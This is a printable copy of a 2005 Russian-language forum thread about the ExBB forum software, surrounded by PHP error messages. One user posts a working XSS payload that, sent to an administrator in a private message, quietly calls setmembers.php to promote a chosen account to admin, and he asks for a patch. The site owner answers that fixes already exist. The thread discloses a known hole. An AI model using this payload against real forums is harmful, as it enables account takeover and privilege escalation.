Strict Standards: Resource ID#25 used as offset, casting to integer (25) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401

Strict Standards: Resource ID#27 used as offset, casting to integer (27) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401

Strict Standards: Resource ID#28 used as offset, casting to integer (28) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401
ТвойWeb :: Версия для печати :: Дыра в коде форума
ТвойWeb » » ExBB - лучший форум на файлах » Дыра в коде форума

Страниц (1): [1]
 

1. AlexXx - 01 Апреля, 2005 - 14:37:07 - перейти к сообщению
Возможно,эта проблема уже обсуждалась,но тем не менее:
любой пользователь форума ExBB может получить права администратора
путём отправки ему личного сообщения,содержащего ccылку,включающую
в себя следующие строки:

CODE:
'style='background:url(javascript:document.images[0].src="<Директория с форумом>/setmembers.php?action=edit_user&checkaction=yes&userid=84&membertitle=&emailaddress=lol@lol.
ru&newname=Alexxx&password=&homepage=&aolname=&icqnumber=&location=
&interests=&signature=&numberofposts=0&avatar=noavatar.gif&membercode=
ad&submit=%CE%F2%EF%F0%E0%E2%E8%F2%FC")'


Т.е. методом XSS застравляем браузер думать что он грузит картинку, а на самом деле он открывает линк на редактирование профиля и повышения его до админа.

Дайте,пожалуйста, линк на заплатку,если таковая существует...
2. TvoyWeb - 01 Апреля, 2005 - 15:16:47 - перейти к сообщению
AlexXx пишет:
Возможно,эта проблема уже обсуждалась,но тем не менее:

Обсуждалось и не раз. Надо учиться пользоваться поиском.
Заплатки ищи на www.exbb.net
Кстати в архивах с файлами форума уже есть эта заплатка.

Форум на AlfaSpace.NET


Powered by ExBB
ExBB FM 1.0 RC1 by TvoyWeb.ru
InvisionExBB Style converted by Markus®

[Script Execution time: 0.0597]     [ Gzipped ]



Notice: ob_end_flush(): failed to send buffer of ob_gzhandler (1) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/page_tail.php on line 33